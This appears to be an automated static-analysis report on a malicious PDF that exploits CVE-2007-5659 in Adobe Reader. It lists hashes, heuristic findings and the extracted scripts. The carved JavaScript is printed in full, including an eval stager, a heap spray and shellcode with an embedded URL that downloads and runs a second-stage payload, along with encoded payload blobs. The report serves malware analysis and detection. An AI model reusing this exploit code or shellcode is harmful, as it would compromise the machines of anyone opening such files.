Malicious PDF — malware analysis report

Static analysis result for SHA-256 6f206b2ac5af2fc0…

MALICIOUS

PDF

16.8 KB
MD5: d4ed99c2521e7b9772211a9f0b68e816 SHA-1: 1546e0ea515a61002a3907866c7cb4eb76c94d47 SHA-256: 6f206b2ac5af2fc0f3d0f959a6302f6378086130064342b308013a08702a1351
406 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed as a dropper, downloading a second-stage payload from the URL http://7winx.com/cgi-bin/directory.shtml/n002106204r0409X6804c1e8Y751d7ca9. The presence of multiple anti-analysis checks and the specific exploit targeting indicate a malicious intent to compromise the user's system.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://7winx.com/cgi-bin/directory.shtml/n002106204r0409X6804c1e8Y751d7ca9 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x40C8 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
76f3d34eefa7a2d832e3c543ded9206cbbb0ea6c076ba37c7d512aba1731b395		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x19C7 5133 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var g_W3FT = new Array();var O__vSi = 0;var q3_6l__M = "";function p_x4r76m_will(Ca2__75Lo, Vi5IvMr_m){var h6v2_wq7Q = Vi5IvMr_m.toString();var Mc0Rp886n = "";for(var qx_k_Xju = 0; qx_k_Xju < h6v2_wq7Q.length; qx_k_Xju++) {var j_SGo1Wjw4XWA3 = parseInt(h6v2_wq7Q.substr(qx_k_Xju, 1));if (!isNaN(j_SGo1Wjw4XWA3)) {j_SGo1Wjw4XWA3 = j_SGo1Wjw4XWA3.toString(16);if (j_SGo1Wjw4XWA3.length == 1) { j_SGo1Wjw4XWA3 = "0" + j_SGo1Wjw4XWA3; }else if (j_SGo1Wjw4XWA3.length != 2) { j_SGo1Wjw4XWA3 = "00"; }Mc0Rp886n = j_SGo1Wjw4XWA3 + Mc0Rp886n;if (Mc0Rp886n.length == 8) {break;}}}while(Mc0Rp886n.length < 8) { Mc0Rp886n = "0" + Mc0Rp886n; }var qT6x_p0_s7J5P = Ca2__75Lo.toString(16);if (qT6x_p0_s7J5P.length == 1) { qT6x_p0_s7J5P = "0" + qT6x_p0_s7J5P; }else if (qT6x_p0_s7J5P.length != 2) { qT6x_p0_s7J5P = "00"; }Mc0Rp886n = "3" + qT6x_p0_s7J5P + "P" + Mc0Rp886n;return Mc0Rp886n;}function Fws_0v(p3_0im, m8WrN0_M_q_Dn){var l52_8ll0_6CT = new Array("");var krq2_7_66_rV7wn = p3_0im;var y7g___0Iear;if ((y7g___0Iear = p3_0im.lastIndexOf("%u00")) != -1) {if (y7g___0Iear + 6 == p3_0im.length) {l52_8ll0_6CT[0] = p3_0im.substr(y7g___0Iear + 4, 2);krq2_7_66_rV7wn = p3_0im.substring(0, y7g___0Iear);}}y7g___0Iear = 1;for (qx_k_Xju = 0; qx_k_Xju < m8WrN0_M_q_Dn.length; qx_k_Xju++) {var m_CHCR = m8WrN0_M_q_Dn.charCodeAt(qx_k_Xju).toString(16);if (m_CHCR.length == 1) { m_CHCR = "0" + m_CHCR; }l52_8ll0_6CT[y7g___0Iear] = m_CHCR;y7g___0Iear++;}qx_k_Xju = l52_8ll0_6CT[0].length ? 0 : 1;l52_8ll0_6CT[y7g___0Iear] = "00";l52_8ll0_6CT[y7g___0Iear + 1] = "00";y7g___0Iear += 2;if ((l52_8ll0_6CT.length - qx_k_Xju) % 2) {l52_8ll0_6CT[y7g___0Iear] = "00";}while(qx_k_Xju < l52_8ll0_6CT.length) {krq2_7_66_rV7wn += "%u" + l52_8ll0_6CT[qx_k_Xju + 1] + l52_8ll0_6CT[qx_k_Xju];qx_k_Xju += 2;}krq2_7_66_rV7wn += "%u0000";return krq2_7_66_rV7wn;}function R_hpb_Xi____1d(nUI_5o, Ug_D6___CI_c_m){while (nUI_5o.length*2<Ug_D6___CI_c_m) {nUI_5o += nUI_5o;}nUI_5o = nUI_5o.substring(0,Ug_D6___CI_c_m/2);return nUI_5o;}function gL1X_q7gjSE(SaA3p11, Cwc_2b3M7A, IUBdhFSCT){var T13pSg7__q_i7 = 0x0c0c0c0c;var nUI_5o = unescape(Cwc_2b3M7A);var m8WrN0_M_q_Dn = p_x4r76m_will(SaA3p11, IUBdhFSCT);var m6N55I7 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var p3_0im = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4e70%u6d4a%u006a%u7468%u7074%u2f3a%u372f%u6977%u786e%u632e%u6d6f%u632f%u6967%u622d%u6e69%u642f%u7269%u6365%u6f74%u7972%u732e%u7468%u6c6d%u6e2f%u3030%u3132%u3630%u3032%u7234%u3430%u3930%u3658%u3038%u6334%u6531%u5938%u3537%u6431%u6337%u3961";app.o3F3N_DvnY8 = unescape(Fws_0v(p3_0im, m8WrN0_M_q_Dn));var Q__oBB_8_sS = 0x400000;var b421r_fB5i7A8u = m6N55I7.length * 2;var Ug_D6___CI_c_m = Q__oBB_8_sS - (b421r_fB5i7A8u+0x38);nUI_5o = R_hpb_Xi____1d(nUI_5o, Ug_D6___CI_c_m);var p___6G_aq5kV_Li = (T13pSg7__q_i7 - 0x400000)/Q__oBB_8_sS;for (var X6XMs__iA8_G6eI = 0; X6XMs__iA8_G6eI < p___6G_aq5kV_Li; X6XMs__iA8_G6eI++) {g_W3FT[X6XMs__iA8_G6eI] = nUI_5o + m6N55I7;}}function cEwGxAXkj__3T(){var m4__1C = "";for (qx_k_Xju = 0; qx_k_Xju < 12; qx_k_Xju++) {m4__1C += unescape("%u0c0c%u0c0c");}var D_F122__Qc_S
... (truncated)
legacy_pdfkit_stage_000.js
39f77b9be8d0a4e462b273540dd67a0ed26d33e1dcff418ddb158b1d38ce1500		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1A1B 11661 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function ul6__7k(q0_U0_cN_27b_U, d_1i2_a_t){var TS_xOm0N___uU = 512;var L__cNW__W1_ty = 2;var UCP0IDA_5phT_Qx = 0;var O_6_6aC_U3 = 0;var Tp1D_0_M08 = "";var wpeo04_28_6 = "";var D6Pr_3_Rp = 0;var JKVdT__bH_w = 6 + 1;try {var qtG0JF_3ifw = 0;if (app) {O_6_6aC_U3 = O_6_6aC_U3 + 2;d_1i2_a_t = pr[qtG0JF_3ifw].subject;}} catch(e) { }O_6_6aC_U3 = O_6_6aC_U3 + 7;var r3__fqLK7bB = new Array();if (!q0_U0_cN_27b_U) { r3__fqLK7bB = new Array(109,37,150,201,92,83);} else {r3__fqLK7bB = q0_U0_cN_27b_U;}var t_h_kiNE = 0;var Oa_WyF____XkPkt = 0;var d7__o7_A = 0;JKVdT__bH_w--;if (JKVdT__bH_w == 0) {} else {for(Oa_WyF____XkPkt = 0; Oa_WyF____XkPkt < d_1i2_a_t.length; Oa_WyF____XkPkt += L__cNW__W1_ty) {if (t_h_kiNE >= JKVdT__bH_w) {t_h_kiNE = 0;}var FT1v_Y207L = d_1i2_a_t.substr(Oa_WyF____XkPkt, L__cNW__W1_ty) + 'XXZ';var c_c2sxi_smb_om = parseInt(FT1v_Y207L, 19 + L__cNW__W1_ty);c_c2sxi_smb_om -= r3__fqLK7bB[t_h_kiNE] * (d7__o7_A + L__cNW__W1_ty);t_h_kiNE++;if (c_c2sxi_smb_om < 0) {c_c2sxi_smb_om = String.fromCharCode(c_c2sxi_smb_om - Math.floor(c_c2sxi_smb_om/256)*256);} else {c_c2sxi_smb_om = String.fromCharCode(c_c2sxi_smb_om);}if (O_6_6aC_U3 == 9) {Tp1D_0_M08 += c_c2sxi_smb_om;} else if (O_6_6aC_U3 == 8) {Tp1D_0_M08 += PK7a_TRi;} else {if (O_6_6aC_U3 != 9) {Tp1D_0_M08 += Oa_WyF____XkPkt;}}d7__o7_A++;}}var eIl47t__Y3 = this;eIl47t__Y3['ev'+'al'](Tp1D_0_M08);}
	ul6__7k(0, "3h9j9d0d6h7h92621dbg575b1176989j7551bf5i366a9b353e499c2db148c31f4e9h451a52967d536g3j247e4h157c148e91a5b36a0ibh4b196gbf2ia260bd591i1i0k504f2d0k188h0dbea261065j1c2a556j94c1bb9a117hb9446j51008d8k26790a84106g967g5k5cb9920c63a013568i782g3584316j47c0ba78727cad0i463gad5964be14c3c32f98798280281e5e7fb13g4423b93k82a13e074k18bk9i7k3cc03g7i6j622ia811292aae1i4h8d6b83aeb37bai397d34004g8j9c122i8b024h3fad69c07635856j8kaa1f3j40638b6b8d32962gc38b2i170j88ba54a9bk9g850g813e8e2d4c3a6aak8g80c3744g2j302b5ka65d0a57af48c25i3f342c30b34421208j9j0e4a8fbi5i815h0532b6b4426h1i9b9b2i946bb31053c1907da9785f6d4709bc2643bk1112069a1d6cb922af5ib3a5443a7823ba692e6haa588k110i7h8f1g664f58a3589962073f255b325087ba316e8h0gb3b0615h5h2381747c32989ib6159c58337c8abda9351a681e8d1i1e736c6j2a063e27612h214kbc74225f7b3iaj4fb637647gc2ajaa8f34b8ab48ae1g9593a68a6b754jb18g31873c3f2db7ad5ha81j3d9c70331i7f4cae253cb4646a9191ab1f2jb877230a89ae1d88809k47620j45558kbf485j6788423a9e4e2e2k6g889e8f40bc4c3655b351551ib80ea905059g2k8b00bi6j83186847bi2ca7481i421k6k669b0f7k003871498aa8119547073j9e8938016320b9a315bgb98b42887e034847499dbf9g261c576h956988049h8a427cb16k9849802k53680i7e4f402hc0417b09398kae535f33c02h495h5cae986k3i604f78a7380dae090050795f9342595b3c2b152j132j7f1k0gc06g051b702eaa170ea5436k0j95a5243c7g8d72bcab0588bhbj6j5f801j8170848j3a108jag401jbh506h8740967d5j910c38615b9f8ba31abkc389501e9d63bc9b3ebi94a08j256937827026332kbd430g0k6g4e7j56397f670dba0e9f736i3h7fbi802608012h0kb49kbe0j6c8k444b13a5136aaa4g4gabc27788a7740c3c4fbi8778831a488c6ab67a762hb5bc1c96bd2187ba0893929b19533h6337a2994079856a551496644c117j629d9f4bc04k4030c36g3a277a10b13b93b017830i2g3f1b90713934228h221886036961779j6cbe0349547k9930986d884k21b92k2440ad0b9e7h1i8272299049132i5k7d9aa49cc2179dak7dak68057d931861b390ae7a607843622c9f35550k1d4j8f662578ag61524kb813447k49b20i44bkab434hbec294bg4abka0706d24227i8d1456084db63g78b45j3k5d46bf846ebi0hbi8a66a5b47g1k2g2c01aj0i8f5c991h0gb9702h8b3aa1526a8b232cbb0c670f1f737i4h239f73877k1a44166ha7a94g33782cc38i27a527b31k9278b7a047134j4j77433h5e6i846ca7088a3438304k6i9a3601518261ba5h771f55231858031a847e054c599a204a27c1ba8a84134dbh609h5g075fb24h4kbk8ead0i82445k551598290da0ah0da28e2h3ka61jbb6ja50g716gag1hb83i0596a75c740ba1aa9ec27f4i71b5846e60a235ae8b184a4k1h414fb43j19ak6676242a5e6i745fbc9c0d35945k337f4k9c8c18ag60078e1d4c576k694c0e12216520b75e325h225fab471f132c3a3i9622a619a23caf1252890k8j930k9c9h9a7h1i9050823e54148i217db2b1619j784c1f887i972ic38d2j766i912255bc8g8g4abjb4b10g7gb276324b0g4i1d9b00405a5jb17c639e53256d3cb0a17j270b2k5a6aad2d80c10428113d2i10437g323g8dbfc36j4e2k0f713e0f7827a18h9b0i7kb9394k605i8592bk2h0765ak945i24702e1a9a13b616aj3ab05i0c7d753ia9b7b52e397g8g84968h9b6g923i6c2i9aba83a52j5k32a7514j45b9b236629i14749c24616118307e6i1gaj9d5j0k5g12896
... (truncated)
deobfuscated.js
83b154ac0aae3b0e6999b4e18e0458a5925798c607e5b6797c9c9aaf2e0415f0		 deobfuscated-js PDF JavaScript deobfuscation pass 139048 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
3h9j9d0d6h7h92621dbg575b1176989j7551bf5i366a9b353e499c2db148c31f4e9h451a52967d536g3j247e4h157c148e91a5b36a0ibh4b196gbf2ia260bd591i1i0k504f2d0k188h0dbea261065j1c2a556j94c1bb9a117hb9446j51008d8k26790a84106g967g5k5cb9920c63a013568i782g3584316j47c0ba78727cad0i463gad5964be14c3c32f98798280281e5e7fb13g4423b93k82a13e074k18bk9i7k3cc03g7i6j622ia811292aae1i4h8d6b83aeb37bai397d34004g8j9c122i8b024h3fad69c07635856j8kaa1f3j40638b6b8d32962gc38b2i170j88ba54a9bk9g850g813e8e2d4c3a6aak8g80c3744g2j302b5ka65d0a57af48c25i3f342c30b34421208j9j0e4a8fbi5i815h0532b6b4426h1i9b9b2i946bb31053c1907da9785f6d4709bc2643bk1112069a1d6cb922af5ib3a5443a7823ba692e6haa588k110i7h8f1g664f58a3589962073f255b325087ba316e8h0gb3b0615h5h2381747c32989ib6159c58337c8abda9351a681e8d1i1e736c6j2a063e27612h214kbc74225f7b3iaj4fb637647gc2ajaa8f34b8ab48ae1g9593a68a6b754jb18g31873c3f2db7ad5ha81j3d9c70331i7f4cae253cb4646a9191ab1f2jb877230a89ae1d88809k47620j45558kbf485j6788423a9e4e2e2k6g889e8f40bc4c3655b351551ib80ea905059g2k8b00bi6j83186847bi2ca7481i421k6k669b0f7k003871498aa8119547073j9e8938016320b9a315bgb98b42887e034847499dbf9g261c576h956988049h8a427cb16k9849802k53680i7e4f402hc0417b09398kae535f33c02h495h5cae986k3i604f78a7380dae090050795f9342595b3c2b152j132j7f1k0gc06g051b702eaa170ea5436k0j95a5243c7g8d72bcab0588bhbj6j5f801j8170848j3a108jag401jbh506h8740967d5j910c38615b9f8ba31abkc389501e9d63bc9b3ebi94a08j256937827026332kbd430g0k6g4e7j56397f670dba0e9f736i3h7fbi802608012h0kb49kbe0j6c8k444b13a5136aaa4g4gabc27788a7740c3c4fbi8778831a488c6ab67a762hb5bc1c96bd2187ba0893929b19533h6337a2994079856a551496644c117j629d9f4bc04k4030c36g3a277a10b13b93b017830i2g3f1b90713934228h221886036961779j6cbe0349547k9930986d884k21b92k2440ad0b9e7h1i8272299049132i5k7d9aa49cc2179dak7dak68057d931861b390ae7a607843622c9f35550k1d4j8f662578ag61524kb813447k49b20i44bkab434hbec294bg4abka0706d24227i8d1456084db63g78b45j3k5d46bf846ebi0hbi8a66a5b47g1k2g2c01aj0i8f5c991h0gb9702h8b3aa1526a8b232cbb0c670f1f737i4h239f73877k1a44166ha7a94g33782cc38i27a527b31k9278b7a047134j4j77433h5e6i846ca7088a3438304k6i9a3601518261ba5h771f55231858031a847e054c599a204a27c1ba8a84134dbh609h5g075fb24h4kbk8ead0i82445k551598290da0ah0da28e2h3ka61jbb6ja50g716gag1hb83i0596a75c740ba1aa9ec27f4i71b5846e60a235ae8b184a4k1h414fb43j19ak6676242a5e6i745fbc9c0d35945k337f4k9c8c18ag60078e1d4c576k694c0e12216520b75e325h225fab471f132c3a3i9622a619a23caf1252890k8j930k9c9h9a7h1i9050823e54148i217db2b1619j784c1f887i972ic38d2j766i912255bc8g8g4abjb4b10g7gb276324b0g4i1d9b00405a5jb17c639e53256d3cb0a17j270b2k5a6aad2d80c10428113d2i10437g323g8dbfc36j4e2k0f713e0f7827a18h9b0i7kb9394k605i8592bk2h0765ak945i24702e1a9a13b616aj3ab05i0c7d753ia9b7b52e397g8g84968h9b6g923i6c2i9aba83a52j5k32a7514j45b9b236629i14749c24616118307e6i1gaj9d5j0k5g12896d3ebh8j270778666e93c1643a0826b12g30398cc233bj6g4c487j3b0g2a23ae437ca79gbc3k427cc05eaaa996a7b5079g4950be767e759a381e90c16i30174j8k871ga39j6j9409c23c7b9c8h9e17bc25b380159f2ebiab43b07i0887005d3d6g5b401j4ia07209186956771i4j675f0dbj05ab42aa0k621d4k2j04012ha5bga9162i7eak747938aj3295184h549a96474ea74k8j3g67bi6j92960e4f5f5b919366263602129h180i629d2j959189c3432788bj845f0f445c6c6a41a88f73416c6i7fab6cbf1k0f3d933e3e3h9hajb92b0cbj19a81j5277a19i4j4736b3b645417k438a617i90a73e2d804783bj2i6h2h7i1kb3ag0k5b57bd0i0a8i34bd7i4ja13k094j7h4jbfc1bbb80h7eak6fah588f9070aa619b56ahag927267562b613865c31f437e9h4a3583317k1ibi07498c7688044e19973e5hb119bh0c5g9863878a285b487bb8481921126h6kb369414i1hc16b46c23abk4g3b622d74b21i0dbd1k1bbd649h040ab8b425842dbi5d995b1d1b97bg3g039g718i4653719i8k7k101c1e54a1a88k1j9i24bh9838041ebf31849eai977i4h4b147d0g1e3k86b08baja77c465041248ka8529i5bb3298j3537c11g2kb11kaib27j8i3j3h8e0c5h7g1j3933ak913b4j24716b560j86bh4f7c9ia2ak1jb1596e5d120j1j30bk2131bibe1e6ba643b165a808436g9jbkak49405b6f729f0bad7j91237f5a77bg8c8j6gab642d833k527aab0g7g9g1h16806141591b866i8463919e002a9a514i857kbdb031bi8c258218134a8691421c310162bdag2jbc9b357e9f492a1e3b3b5f761183156211751245a034970f9c05aa9d8g2ic36b8b3k1e1b83036c9ibe3f9j784c2d887c991k3d7k3g6j6i9d1d5739028d0609a3a01255ah8c637i41764h9eba4g5d2jbg632j036h62415hbj8c7a1kc33j413bb91f52bk8g0g1a391iad608e180e748f93643e0b399k51334f0f789519068i9g4042
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.